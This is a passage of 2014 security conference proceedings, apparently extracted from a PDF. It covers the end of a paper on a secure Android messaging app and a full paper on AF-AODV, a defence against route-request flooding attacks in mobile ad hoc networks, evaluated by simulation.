other implementations. Also, in higher security levels, the
11
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
performance of non-standard elliptic-curve cryptography is
significantly better than standard alternative. In contrast,
non-standard pairings-based cryptography has shown
relatively low performance. Figure 6 illustrates this behavior
for signature operations on a Samsung Galaxy S III (1.4 GHz
quad-core Cortex-A9, 1 GB RAM, and 16GB storage).
Complete results can be found in [1].
The observed responsiveness shown by the prototype is
quite competitive and usage has shown that delay caused by
key negotiation is negligible, considering a local wireless
network (Wi-Fi) and a household deployment of a XMPP
server with few users. However, additional effort needs to be
taken in order to optimize the mobile app as well as improve
both performance and scalability on server-side application.
V.
IMPROVEMENTS UNDER DEVELOPMENT
By the time of writing, two improvements were under
construction. The first is a mobile PKI responsible for digital
certification, which is fully integrated to the mobile security
framework. PKI’s Server-side is based upon the EJBCA PKI
[13]. Client-side follows recent recommendations for
handling certificates on mobile devices [38].
The second is a secure text conference (or group chat) via
instant messages. As depicted in Figure 4, the Organizer or
Chair of the conference requests the conference creation to
the Server, as this is an ordinary XMPP feature. The key
agreement for the requested conference proceeds as follows,
where Enck(x) means encryption of x with key k:
1. Chair (C) creates the key for that conference (ck);
2. For each guest (g[i]), Chair (C) does:
a) Opens a STS channel with key k: C g[i], key k;
b) Sends ck on time t to g[i]: C g[i]: Enck(ck).
The steps above constitute a point-to-point key transport
using symmetric encryption, which is provided by the STS
protocol. After that, all guests share the same conference key
and the conference proceeds as a multicast of all encrypted
messages. Figure 5 shows a screenshot for a secure
conference, in which users are differentiated by colors. Both
the conversation and the interface are in Portuguese.
VI.
CONCLUDING REMARKS
This paper discussed design and implementation issues
on the construction of a cryptographically secure Instant
Message application for Android and the underlying
cryptographic library that supports it. This text has shown
how cryptographic services can be crafted to adequately fit
to a secure IM service in a way that is transparent to the final
user, without sacrificing security. A well defined architecture
allowed the selection and use of non-standard cryptography.
Future work includes other cryptographically secure
services, such as SMS, group chat, and mobile PKI, as well
as protections against side-channels and vulnerabilities of
insecure programming. Also, performance over 3G networks
is being measured and analyzed, for future improvements.
ACKNOWLEDGMENT
The authors acknowledge the financial support given to
this work, under the project "Security Technologies for
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 5. Screenshot of a secure text conference (group chat).
Mobile Environments – TSAM", granted by the Fund for
Technological Development of Telecommunications –
FUNTTEL – of the Brazilian Ministry of Communications,
through Agreement Nr. 01.11. 0028.00 with the Financier of
Studies and Projects - FINEP / MCTI.
REFERENCES
A. M. Braga and E. M. Morais, “Implementation Issues in the
Construction of Standard and Non-Standard Cryptography on
Android Devices,” The Eighth International Conference on Emerging
Security Information, Systems and Technologies (SECURWARE
2014), in press.
[2] A. Braga and E. Nascimento, Portability evaluation of cryptographic
libraries on android smartphones. In Proceedings of the 4th
international conference on Cyberspace Safety and Security (CSS'12),
Yang Xiang, Javier Lopez, C.-C. Jay Kuo, and Wanlei Zhou (Eds.).
Springer-Verlag, Berlin, Heidelberg, 2012, pp. 459-469.
[3] A. M. Braga, “Integrated Technologies for Communication Security
on Mobile Devices”, The Third International Conference on Mobile
Services, Resources, and Users (Mobility) , 2013, pp. 47–51.
[4] A. M. Braga, E. N. Nascimento, and L. R. Palma, “Presenting the
Brazilian Project TSAM – Security Technologies for Mobile
Environments”, Proceeding of the 4th International Conference in
Security and Privacy in Mobile Information and Communication
Systems (MobiSec 2012). LNICST, vol. 107, 2012, pp. 53-54.
[5] B. Kaliski, “PKCS #5: Password-Based Cryptography Specification”,
Version 2.0, RFC 2898. Retrieved [July 2014] from
tools.ietf.org/html/rfc2898.
[6] B. O'Higgins, W. Diffie, L. Strawczynski, and R do Hoog,
"Encryption and ISDN - A Natural Fit", International Switching
Symposium (ISS87), 1987.
[7] B. Xuefu and Y. Ming, “Design and Implementation of Web Instant
Message System Based on XMPP”, Proc. 3rd International
Conference on Software Engineering and Service Science (ICSESS),
Jun. 2012, pp. 83-88.
[8] D. Aranha and C. Gouvêa, “RELIC Toolkit. Retrieved [July 2014]
from code.google.com/p/relic-toolkit.
[9] D. Boneh, B. Lynn, and H. Shacham, “Short signatures from the Weil
pairing”, J. Cryptology, 17(4), Sept. 2004, pp. 297–319.
[10] D. Bornstain, Dalvik VM Internals. Retrieved [July 2014] from
sites.google.com/ site/io/dalvik-vm-internals.
[1]
12
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
35
30
25
Time (ms)
[11] D. Hankerson, A. J. Menezes, and S. Vanstone. Guide to Elliptic
Curve Cryptography, Springer-Verlag, New York, Inc., Secaucus, NJ,
USA, 2003.
[12] D. T. Massandy and I. R. Munir, “Secured Video Streaming
Development on Smartphones with Android Platform”, Proc. 7th
International Conference on Telecommunication Systems, Services,
and Applications (TSSA), Oct. 2012, pp. 339-344.
[13] EJBCA PKI CA. Retrieved [July 2014] from http://www.ejbca.org.
[14] F. Zhang, R. Safavi-Naini, and W. Susilo, “An Efficient Signature
Scheme from Bilinear Pairings and Its Applications”, in F. Bao, R. H.
Deng and J. Zhou, ed., 'Public Key Cryptography', 2004, pp. 277-290.
[15] H. Krawczyk, "SIGMA: The „SIGn-and-MAc’ approach to
authenticated Diffie-Hellman and its use in the IKE protocols."
Advances in Cryptology-CRYPTO 2003, Springer Berlin Heidelberg,
2003, pp. 400-425.
[16] How to Implement a Provider in the Java Cryptography Architecture.
Retrieved [July 2014] from docs.oracle.com/javase/7/docs/technotes/
guides/security/crypto/HowToImplAProvider.html.
[17] J. Bos, D. Osvik, and D. Stefan, “Fast Implementations of AES on
Various Platforms”, 2009. Retrieved [July 2014] from
eprint.iacr.org/2009/501.pdf.
[18] J. D. Bernstein, The Salsa20 family of stream ciphers. Retrieved [July
2014] from cr.yp.to/papers.html#salsafamily.
[19] J. Menn, Experts report potential software "back doors" in U.S.
standards. Retrived [July 2014] from http://www.reuters.com/article
/2014/07/15/usa-nsa-software-idUSL2N0PP2BM20140715?irpc=932.
[20] Java Cryptography Architecture (JCA) Reference Guide. Retrieved
[July 2014] from docs.oracle.com/javase/7/docs/technotes/guides/
security/crypto/CryptoSpec.html.
[21] Java Cryptography Architecture Oracle Providers Documentation for
Java Platform Standard Edition 7. Retrieved [July 2014] from
docs.oracle.com/javase/7/docs/technotes/guides/security/SunProvider
s.html.
[22] Java Cryptography Architecture Standard Algorithm Name
Documentation for Java Platform Standard Edition 7. Retrieved [July
2014] from docs.oracle.com/javase/7/docs/technotes/guides/security/
StandardNames.html.
[23] Java Cryptography Extension Unlimited Strength Jurisdiction Policy
Files 7 Download. Retrieved [July 2014] from www.oracle.com/
technetwork/java/javase/downloads/jce-7-download-432124.html.
[24] M. Egele, D. Brumley, Y. Fratantonio, and C. Kruegel, “An empirical
study of cryptographic misuse in android applications,” Proceedings
of the 2013 ACM SIGSAC conference on Computer and
Communications Security (CCS ’13), 2013, pp. 73–84.
[25] NIST FIPS PUB 186-2. Digital Signature Standard (DSS). Retrieved
[July 2014] from csrc.nist.gov/publications/fips/archive/fips1862/fips186-2.pdf.
[26] NIST FIPS-PUB-180-4. Secure Hash Standard (SHS). March 2012.
Retrieved [July 2014] from csrc.nist.gov/publications/fips/fips1804/fips-180-4.pdf.
[27] NIST FIPS-PUB-186. Digital Signature Standard (DSS). Retrieved
[July 2014] from csrc.nist.gov/publications/fips/archive/fips1862/fips186-2.pdf.
[28] NIST FIPS-PUB-197. Announcing the ADVANCED ENCRYPTION
STANDARD (AES). Federal Information Processing Standards
Publication 197 November 26, 2001.
[29] NIST FIPS-PUB-198. The Keyed-Hash Message Authentication
Code
(HMAC).
Retrieved
[July
2014]
from
csrc.nist.gov/publications/fips/fips198/fips-198a.pdf.
[30] NIST SP 800-38A. Recommendation for Block Cipher Modes of
Operation.
2001.
Retrieved
[July
2014]
from
csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf.
20
15
10
5
0
Signing (s) and verification (v)
Figure 6. Time measurements for signature algorithms.
[31] NIST SP 800-38D. Recommendation for Block Cipher Modes of
Operation: Galois/Counter Mode (GCM) and GMAC. 2007.
csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf.
[32] Off-the-Record Messaging webpage. Retrieved [July 2014] from
otr.cypherpunks.ca.
[33] P. Barreto, AES Public Domain Implementation in Java. Retrieved
[July 2014] from www.larc.usp.br/~pbarreto/JAES.zip.
[34] P. Gutmann, “Lessons Learned in Implementing and Deploying
Crypto Software,” Usenix Security Symposium, 2002.
[35] P. Saint-Andre, K. Smith, and R. Tronçon, “XMPP: The Definitive
Guide - Building Real-Time Applications with Jabber Technologies”,
O’reilly, 2009.
[36] Piercing Through WhatsApp’s Encryption. Retrieved [July 2014]
from
blog.thijsalkema.de/blog/2013/10/08/piercing-throughwhatsapp-s-encryption.
[37] R. Sakai, K. Ohgishi, and M. Kasahara. “Cryptosystems based on
pairing”. The 2000 Symposium on Cryptography and Information
Security (SCIS 2000), Okinawa, Japan, January 2000, pp. 26–28.
[38] S. Fahl, M. Harbach, and H. Perl, “Rethinking SSL development in
an appified world,” Proceedings of the 2013 ACM SIGSAC
conference on Computer & communications security - CCS ’13
(2013), 2013, pp. 49–60.
[39] S. Schrittwieser et al., “Guess Who's Texting You? Evaluating the
Security of Smartphone Messaging Applications”. Proc. 19th
Network & Distributed System Security Symposium, Feb. 2012.
[40] SERPENT webpage, “SERPENT A Candidate Block Cipher for the
Advanced Encryption Standard”. Retrieved [July 2014] from
www.cl.cam.ac.uk/~rja14/serpent.html.
[41] SHA-3 proposal BLAKE webpage. Retrieved [July 2014] from
https://131002.net/blake.
[42] SpongyCastle webpage, Spongy Castle: Repackage of Bouncy Castle
for Android, Bouncy Castle Project (2012), Retrieved [July 2014]
from rtyley.github.com/spongycastle/
[43] T. St. Denis. “Cryptography for Developers”, Syngress, 2007.
[44] The Legion of the Bouncy Castle webpage. Legion of the Bouncy
Castle Java cryptography APIs. Retrieved [July 2014] from
www.bouncycastle.org/java.html.
[45] W. Diffie and M. Hellman, “New Directions in Cryptography”, IEEE
Transact. on Inform. Theory, vol. 22, no. 6, Nov. 1976, pp. 644-654.
[46] W. Diffie, P. C. van Oorschot, and M. J. Wiener, “Authentication and
Authenticated Key Exchanges”, Designs, Codes and Cryptography
(Kluwer Academic Publishers) 2 (2), 1992, pp. 107–125.
[47] W. Mao, “Modern cryptography: theory and practice”, Prentice Hall
PTR, 2004.
13
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Resisting Flooding Attacks on AODV
Mohamed A. Abdelshafy and Peter J. B. King
School of Mathematical & Computer Sciences
Heriot-Watt University, Edinburgh, UK
{ma814, P.J.B.King}@hw.ac.uk
Abstract—AODV is a reactive MANET routing protocol that is
vulnerable to a dramatic collapse of throughput when malicious
intruders flood the network with bogus route requests. We
introduce a simple mechanism to resist such attacks that can
be incorporated into any reactive routing protocol. It does not
require expensive cryptography or authentication mechanisms,
but relies on locally applied timers and thresholds to classify
nodes as malicious. No modifications to the packet formats are
needed, so the overhead is a small amount of calculation at nodes,
and no extra communication. Using NS2 simulation, we compare
the performance of networks using AODV under flooding attacks
with and without our mechanism, showing that it significantly
reduces the effect of a flooding attack.
Keywords–MANET, Routing, AODV, Security, Attack, Flooding
I. I NTRODUCTION
A Mobile Ad Hoc Network (MANET) is a decentralized
infrastructureless network in which nodes cooperate to forward
data from a source to a destination. Each node in a MANET
acts both as a router and as a host. Several routing protocols
have been designed for MANETs [1] to optimize network
routing performance. The major issues involved in designing
a routing protocol for MANET are nodes mobility, bandwidth
constrained and error prone wireless channel, resource constrained nodes, and dynamic changing of the network topology
[2].
MANET routing protocols can be classified as proactive or
reactive routing protocols. In proactive (table-driven) routing
protocols, each node maintains one or more tables containing
routing information to every other node in the network. While
in reactive (on-demand) routing protocols, routes are created
whenever a source requires to send data to a destination node
which means that these protocols are initiated by a source
on-demand. In this paper, we focus on the AODV protocol
[3] which is one of the extensively studied reactive protocols,
considered by the IETF for standardization.
AODV [3] is a reactive routing protocol. It uses destination
sequence numbers to ensure the freshness of routes and guarantee loop freedom. To find a path to a destination, a node
broadcasts a route request (RREQ) packet to its neighbors
using a new sequence number. Each node that receives the
broadcast sets up a reverse route towards the originator of
the RREQ unless it has a fresher one. When the intended
destination or an intermediate node that has a fresh route to the
destination receives the RREQ, it unicasts a reply by sending
a route reply (RREP) packet along the reverse path established
at intermediate nodes during the route discovery process. Then
the source node starts sending data packets to the destination
node through the neighboring node that first responded with
an RREP. When an intermediate node along the route moves,
its upstream neighbor will notice route breakage due to the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
movement and propagate a route error (RERR) packet to
each of its active upstream neighbors. Routing information is
stored only in the source node, the destination node, and the
intermediate nodes along the active route which deal with data
transmission. This scenario decreases the memory overhead,
minimizes the use of network resources, and runs well in high
mobility situation.
MANET inherits security threats that are faced in wired as
well as wireless networks and also introduces security attacks
unique to itself [2] due its characteristics. The limitations
associated with battery powered MANET nodes mean that
computationally expensive cryptographic techniques such as
public key algorithms are undesirable.
MANET routing protocols are designed based on the
assumption that all nodes cooperate without maliciously disrupting the operation of the protocol. However, the existence
of malicious nodes cannot be disregarded in any system,
especially in MANETs because of the wireless nature of the
network. A malicious node can attack the network layer in
MANET either by not forwarding packets or by changing some
parameters of routing messages such as sequence number and
IP addresses, sending fake messages several times and sending
fake routing information to cause congestion and so disrupt
routing operations. Node mobility introduces also the difficulty
of distinguishing between stale routes and fake routes. Attacks
on MANETs come in a number of classes [4] and a number
of defences to these attacks have been proposed and evaluated
by simulation [4]–[6]. Attacks against MANET are classified
based on modification, impersonation or fabrication of the
routing messages. While there are large number of existing
attacks, our paper is focused on flooding attack which has a
dramatic impact on AODV [2] [4].
In AODV under flooding attack [7], a malicious node floods
the network with a large number of RREQs to non-existent
destinations in the network. Since the destination does not exist
in the network, a RREP packet cannot be generated by any
node in the network. When a large number of fake RREQ
packets are being injected into the network by malicious nodes,
significant proportions of the network capacity are consumed
by the RREQ packets, depleting the bandwidth available for
data. In addition, routing tables accumulate reverse routes to
the source of the fake packets, often leading to table overflow
and the inability to record new valid routes. This is a type of
denial of service attack.
Security mechanisms are added to existing routing protocols to resist attacks. Cryptographic techniques are used
to ensure the authenticity and integrity of routing messages
[8]. A major concern is the trade off between security and
performance, given the limited resources available at many
MANET nodes. Both symmetric and asymmetric cryptography
have been used as well as hash chaining. Examples of these
14
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
security enhanced protocols are Authenticated Routing for
Ad-hoc Networks (ARAN) [9], Secure Link State Routing
Protocol (SLSP) [10], and Secure Ad-hoc On-demand Distance Vector routing (SAODV) [11]. In addition to the power
and computation cost of using cryptographic techniques, the
performance of secured mechanism such as SAODV is worse
than AODV [4] in the presence of flooding attack because of
the malicious nodes impersonating non-existent nodes which
cannot be discovered by other non-malicious nodes. Thus,
securing the routing messages cannot guarantee the detection
of the flooding malicious nodes.
We introduce a new Anti-Flooding mechanism that can be
used for all on-demand routing protocols. Each node in this
mechanism is responsible for monitoring the behaviour of its
neighbors to detect malicious nodes and exclude them. We
integrate our proposed mechanism into AODV and SAODV as
examples of on-demand routing protocols. This paper demonstrates a significant improvement in performance when using
our mechanism. The results reported here related to AODV,
but we have also measured SAODV with this mechanism and
the improvement in performance is significantly higher than
AODV.
The rest of the paper is organized as follows. Section
II presents the related work. In Section III, our proposed
mechanism to detect the flooding attack is introduced. In Section IV, the simulation approach and parameters is presented.
In Section V, simulation results are given. In Section VI,
conclusions are drawn.
II. R ELATED W ORK
Although significant algorithms have been introduced to
secure MANET, most of these algorithms cannot resist a
flooding attack. A malicious node initiating a flooding attack
generates a large number of RREQs to non-existant nodes.
These RREQ flood out through the MANET and because
the destination does not exist, are propagated by all nodes.
A node has no way of detecting whether the neighbor that
sent the RREQ is malicious or not. All suggested solutions to
the flooding attack attempt to classify neighbors as normal or
malicious nodes and then suppress malicious ones.
Flooding Attack Prevention (FAP) [12] is the first solution
to resist against flooding attack. The algorithm defined a
neighbor suppression method which prioritizes the node based
on the number of RREQ received. A node gets higher priority
if it sends fewer RREQ packets. When a malicious node
broadcasts large number of RREQ packets, the immediate
neighbors of the malicious node observe a high rate of RREQ
and then they lower the corresponding priority according to the
rate of incoming queries. Forwarding received RREQ depends
on the priority value of the sending neighbor. The disadvantage
of this algorithm is that it still disseminates flooding packets
albeit at a reduced rate.
Threshold prevention [13] is introduced to modify FAP
by defining a fixed RREQ threshold. The algorithm assumes
that if the number of RREQ packets received from a neighbor
exceeds the threshold value, this neighbor is a malicious node
and discards all future packets from this malicious node. The
algorithm becomes useless if a malicious node knows the
threshold value then it can bypass the mechanism. Another
disadvantage of this algorithm is that it treats a high mobility
normal node as if it is a malicious node.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
A distributed approach to resist the flooding attack is
introduced in [14]. The algorithm defines two threshold values;
RATE LIMIT and BLACKLIST LIMIT. A RREQ from a
neighbor is processed only if the number of previously received
RREQ from this neighbor is less than RATE LIMIT. On the
other hand, if the number of previously received RREQ from
this neighbor is greater than BLACKLIST LIMIT, the RREQ
is discarded and this neighbor is blacklisted. If the number of
previously received RREQ from this neighbor is greater than
RREQ LIMIT and less than BLACKLIST LIMIT, the RREQ
is queued for processing after a delay expires. A disadvantage
of this approach is the ability of the attacker to subvert the
algorithm by disseminating thresholds levels and the possibility
of permanently suspending a blacklisted neighbor that is not
malicious.
The algorithm introduced in [15] tried to find a solution
to the flooding attack from the communication point of view.
The algorithm defines three threshold values; transmission
threshold, blacklist threshold and white listing threshold. A
RREQ from a neighbor is processed only if received RREQ
rate from this neighbor is less than the transmission threshold;
otherwise the node will discards the RREQ. If the received
RREQ rate from this neighbor is greater than the blacklist
threshold, the RREQ is discarded and this neighbor is blacklisted. This algorithm avoids permanently suspending of a
blacklisted neighbor by introducing a white listing threshold.
A blacklisted neighbor can be returned to normal status if it
behaves correctly for a whitelisting time interval.
The algorithm introduced in [16] extends DSR protocol
based on the trust function to mitigate the effects of flooding
attack. This algorithm classifies a node neighbors based on
a trust value to three categories; friend, acquaintance and
stranger. Friend is a trusted node and stranger is a non-trusted
node while an acquaintance has the trust value that is greater
than a stranger and less than a friend. The algorithm defines
a threshold value to each neighbor type. A node decision will
be taken based on the neighbor type that sends the RREQ and
threshold value of this neighbor type. As a general rule, if
a node receives a RREQ from a neighbor, it first checks its
relationship class and based on this it checks if this neighbor
runs over the relationship class threshold value or not. The
node processes the RREQ if this neighbor still running under
the relationship class threshold otherwise it discards the RREQ
and blacklists this neighbor. The disadvantage of this algorithm
is that it cannot support high node mobility. [17] introduces a
modification to this algorithm to extend the algorithm for high
node mobility. A significant disadvantage of this approach is
that it depends on a modification of DSR and cannot be adapted
to other MANET protocols.
III. AF-AODV P ROTOCOL
AF-AODV is designed to mitigate the effect of the flooding
attack on the performance of AODV protocol. The mechanism
does not use cryptographic techniques which conserves the
power and computation resources. Each node in the network
has to monitor the performance of its neighbors to detect if they
are trying to flood the network or not. Malicious nodes will
be detected reliably within a very few minutes. The only way
for a malicious node to subvert the mechanism is to transmit
fake RREQ packets at such a low rate that they do not impact
the network performance significantly.
15
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The idea is to record for each neighbor the rate at which
it transmits RREQs. A node pursuing a flooding attack will
be generating a high number of RREQs. If the rate exceeds a
threshold, then the neighbor is added to a black list of potential
malicious nodes. Once on the black list, RREQs from the black
listed node are not forwarded, but they are still recorded. A
node can be removed if its rate of RREQ generation reduces
below the threshold. If the rate continues high, the offending
node is queried - only a non-malicious node will respond. After
two queries, the neighbor will be suspended for a period, and
if its rate is still high after the period has elapsed it will be
declared as malicious. A node implementing the Anti-Flood
mechanism behaves as follows:
•
•
•
•
Every TRAFFIC TIME, the number of RREQs received from each neighbor since the last classification
update is examined.
If the number of RREQs received from a neighbor exceeds the threshold RREQ THRESHOLD, that
neighbour has its black list value set to 1. If multiple neighbours exceed the threshold, the neighbor
which has transmitted the largest number of RREQs
has its black list value set to 1. Other neighbors
that exceeded the threshold are suspended. RREQs
from suspended nodes are ignored and not forwarded. Suspension of neighbors except the one with
the largest RREQ count allows the mechanism to
avoid double counting of RREQs and concentrate on
classification of the worst offender. Choice of the
RREQ THRESHOLD is made by running AODV
on a large number of scenarios and observing the
largest number of RREQs that can be received in
TRAFFIC TIME.
RREQ packets are processed normally when received
from neighbors with a black list value of 0. If a RREQ
is received from a neighbor with a black list value of
1, then the node examines how many RREQs have
been received in an interval of RREQ TIME 1. If that
is less than RREQ COUNT 1, the black list value
for that neighbor is reset to 0. If the number exceeds
RREQ COUNT 1, the node tests the authenticity of
the neighbor by constructing a fake RREP packet
to the RREQ and replying with that RREP. If the
neighbor is malicious, this will not result in any data
flowing. If it is not malicious, data will flow to the fake
RREP originator, which can respond with a RERR so
that a new route can be found. If no data flows within
RREP WAIT TIME, the neighbor’s black list value
is set to 2.
If a RREQ is received from a neighbor with a
black list value of 2, it re-examines the rate of
RREQ received from that node. If the number of
RREQ received from this neighbor is less than
RREQ COUNT 1 in a duration less than or equals
RREQ TIME 1, it decrements the black list value
to 1. Otherwise the node again sends a fake RREP
to the RREQ sender to test its authenticity. If the
RREP WAIT TIME expires without receiving the
data, the node assigns 3 to black list value of this
neighbor and suspends this neighbor for a long period equals to the next TRAFFIC TIME + EXCLUDE TIME. This long suspension ensures that if
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE I. AF-AODV PARAMETERS
RREQ THRESHOLD
RREQ COUNT 1
RREQ COUNT 2
RREQ TIME 1
RREQ TIME 2
RREP WAIT TIME
TRAFFIC TIME
EXCLUDE TIME
•
•
10
7
3
5
2
1s
10 s
60 s
the behaviour of this neighbor has been affected by
a malicious node, then that malicious node will have
been identified and isolated during this suspension.
After the long-time suspension has expired, the
node restarts the previous process; it counts again
the number of received RREQ from this neighbor and if the number is less than the threshold
RREQ THRESHOLD, it decrements the black list
value to 2. Otherwise it will increment the black list
value to 4.
If a RREQ is received from a neighbor with a
black list value equals 4, it monitors the rate of
RREQ received from this neighbor. If the number
of RREQ received from this neighbor is less than
RREQ COUNT 1 in a duration less than or equals
RREQ TIME 1, it decrements the black list value
to 3. Otherwise the node sends a fake RREP to the
RREQ sender to test its authenticity for the final time.
If the RREP WAIT TIME expires without receiving
the data, the node assigns 5 to black list value of this
neighbor meaning that this neighbor is a malicious
node and deletes this neighbor from neighbor list. All
received RREQ from a neighbor that has black list
value equals 5 will be dropped without processing as
a result of detecting a malicious node.
Table 1 shows the values of parameters that were used in our
simulations.
IV. S IMULATION A PPROACH
NS-2 simulator [18] is used to simulate flooding attack.
The simulation is used to analyse the performance of AODV
and our new AF-AODV routing protocols under these attacks.
The parameters used are shown in Table 2. Node mobility was
modelled with the random waypoint method. Our simulation
results are obtained from 3 different movement scenarios, 3
different traffic scenarios and 3 different node-type (malicious
or non-malicious) scenarios which means that each metric
value is the mean of the 27 runs. The node-type scenario is
created randomly. In all cases, the 90% confidence interval
was small compared with the values being reported. In this
paper, we focused on their impact of the flooding attack on
the TCP traffic only. We examined our proposed mechanism
for different number of nodes (25, 50, 75 and 100) and
different node speeds (0, 10, 20 and 30 m/s). Node mobility
had no significant effect of performance in the presence of
malicious nodes, so we report here only the case of static
networks. Similarly, only the case of 100 node networks is
reported, corresponding to a high density of nodes. This gives
malicious nodes a high number of neighbors. We choose a
large simulation time to be sure that all malicious nodes have
16
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Simulation Time
Simulation Area
Number of Nodes
Number of Malicious Nodes
Node Speed
Pause Time
Traffic Type
Flooding Rate
600 s
500 m x 500 m
25, 50, 75, 100
0 - 10
0, 10, 20, 30 m/s
10 s
TCP
2 Packets/s
been detected specially for scenarios with a large number of
malicious nodes.
Packet Delivery Ratio (PDR): The ratio of packets that are
successfully delivered to a destination compared to the number
of packets that have been sent out by the sender.
Throughput: The number of data bits delivered to the application layer of destination node in unit time measured in bps.
End-to-End Delay (EED): The average time taken for a
packet to be transmitted across the network from source to
destination.
Routing Overhead: The size of routing packets measured in
Kbytes for route discovery and route maintenance needed to
deliver the data packets from sources to destinations.
Normalized Routing Load (NRL): The total number of
routing packets transmitted divided by the number of received
data packets.
Route Discovery Latency (RDL): The average delay between
the sending RREQ from a source and receiving the first
corresponding RREP.
Sent Data Packets: The total number of packets sent by all
source nodes during the simulation time.
is shown in Figure 2. The figure shows that the total number
of packets that can be sent is dramatically decreasing as the
number of malicious nodes increases to the extent that when
the number of malicious nodes becomes 10, it can only send
15% of the packets when there is no malicious nodes. Our
proposed mechanism AF-AODV introduces an enhancement
of about 35% over AODV. In addition to this advantage,
AF-AODV has not significantly change for low number of
malicious nodes. By combining Figure 1 and Figure 2, we
can notice a large enhancement in number of packets that is
received by destination specially for large number of malicious
nodes. As an example, if the number of malicious nodes is 10,
the number of received packets by destinations in AODV is
approximately 5600 packets while it is about 20250 packets
in AF-AODV which means that the number of received packets
is improved by approximately 360%.
50000
AODV
AF-AODV
45000
40000
35000
Sent Data Packets
TABLE II. SIMULATION PARAMETERS
30000
25000
20000
15000
10000
5000
0
V. S IMULATION R ESULTS
The effect of flooding attack on the packet delivery ratio
is shown in Figure 1. While the flooding attack has severe
impact on the PDR of AODV specially for large number of
malicious nodes, AF-AODV has not significantly change for
low number of malicious nodes and has negligible decreasing
for high number of malicious nodes. AF-AODV enhances PDR
over AODV by approximately 5%.
94
AODV
AF-AODV
1
2
3
4
5
6
7
8
9
10
Malicious Nodes Number
Figure 2. Send Data Packets
Figure 3 shows the effect of flooding attack on the network
throughput. Throughput of AF-AODV is better than AODV
by approximately 20% for each malicious node. While the
throughput of AODV dramatically decreases as the number of
malicious nodes increases, AF-AODV slightly decreases for
the low number of malicious nodes.
350
90
AODV
AF-AODV
88
300
86
250
84
Throughput
Packet Delivery Ratio (PDR)
92
82
200
150
80
100
78
0
1
2
3
4
5
6
7
8
9
10
Malicious Nodes Number
Figure 1. Packet Delivery Ratio
50
0
0
1
2
3
4
5
6
7
8
9
10
Malicious Nodes Number
The enhancement of PDR becomes more remarkable if we
integrate it to the number of packets that can be sent which
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 3. Network Throughput
17
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The effect of flooding attack on the end-end-delay is shown
in Figure 4. The result shows that there is no significant change
of the delay of AF-AODV while the delay increases as the
number of malicious nodes increases.
AODV
AF-AODV
60000
Routing Overhead (KBytes)
1900
AODV
AF-AODV
1800
End-End-Delay (EED)
70000
1700
50000
40000
30000
20000
10000
1600
0
0
1
2
3
1500
4
5
6
7
8
9
10
7
8
9
10
Malicious Nodes Number
Figure 6. Routing Overhead
1400
1300
0
1
2
3
4
5
6
7
8
9
10
Malicious Nodes Number
22000
20000
Figure 5 shows the effect of flooding attack on the normalized routing load. The result shows that while the normalized
routing load of AODV increases as the number of malicious
nodes increases specially for large number of malicious nodes,
it has not significant change for AF-AODV.
Routing Discovery Latency (RDL)
Figure 4. End-to-End Delay
AODV
AF-AODV
18000
16000
14000
12000
10000
8000
6000
4000
40000
AODV
AF-AODV
2000
0
1
2
3
4
5
6
35000
Normalized Routing Load (NRL)
Malicious Nodes Number
30000
Figure 7. Route Discovery Latency
25000
20000
15000
10000
5000
0
0
1
2
3
4
5
6
7
8
9
10
Malicious Nodes Number
Figure 5. Normalized Routing Load
Figure 6 shows the effect of flooding attack on the routing
overhead. The result shows that the routing overhead of AFAODV has not significantly change for the low number of
malicious nodes and slightly increases as the number of
malicious nodes increases. On the other hand, it increases
dramatically as the number of malicious nodes increases for
AODV.
Figure 7 shows the effect of flooding attack on the routing
discovery latency. The result shows that the routing discovery
latency of AF-AODV is nearly constant regardless the number
of malicious nodes. On the other hand, it increases dramatically
as the number of malicious nodes increases for AODV.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The number of packets that will be dropped as a result of
detecting the presence of malicious nodes is shown in Figure
8. The result shows that while AF-AODV dropped packets
increases as the number of malicious nodes increasing, AODV
cannot detect the presence of malicious nodes and hence the
protocol does not drop packets.
Our simulation shows that regardless the number of nodes
and the number of malicious nodes in the network, the malicious node neighbor can detect its presence in a few minutes
and the time to detect the last malicious node is increases for
sure as the number of malicious nodes increasing. Figure 9
shows the time required by non-malicious nodes to detect the
last malicious node in the network.
VI. C ONCLUSION
In this paper, we introduced a new anti-flooding mechanism
that can be integrated into any reactive routing protocol in
MANET. The proposed mechanism did not use cryptographic
techniques which conserves the power and computation resources. Furthermore, the mechanism did not require any
additional packets and hence does not incur any additional
overhead. As an example, we integrated our anti-flooding
mechanism with AODV to study the performance of the
18
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[5]
300000
AODV
AF-AODV
[6]
250000
200000
Attack Drops
[7]
150000
[8]
100000
[9]
50000
[10]
0
0
1
2
3
4
5
6
7
8
9
10
Malicious Nodes Number
[11]
Figure 8. Attack Dropped Packets
[12]
600
550
25-Nodes
50-Nodes
75-Nodes
100-Nodes
[13]
500
450
[14]
Time (Sec.)
400
350
300
250
[15]
200
150
100
50
1
2
3
4
5
6
7
8
9
10
Malicious Nodes Number
[16]
Figure 9. Time Required to Detect the Last Malicious Node by its Neighbors
[17]
network under the presence and absence of the mechanism. We
validated the performance analysis of our mechanism through
NS2 simulations. Simulation results showed that AF-AODV
has a remarkable improvement of the network performance
in all network metrics than AODV. The proposed mechanism
succeeded to detect malicious nodes that try to flood the network within a few minutes regardless the number of malicious
nodes and the time they are participating in the network. Future
work includes extending this idea to other reactive protocols,
and confirming its general applicability.
[18]
M. Patel and S. Sharma, “Detection of malicious attack in manet a
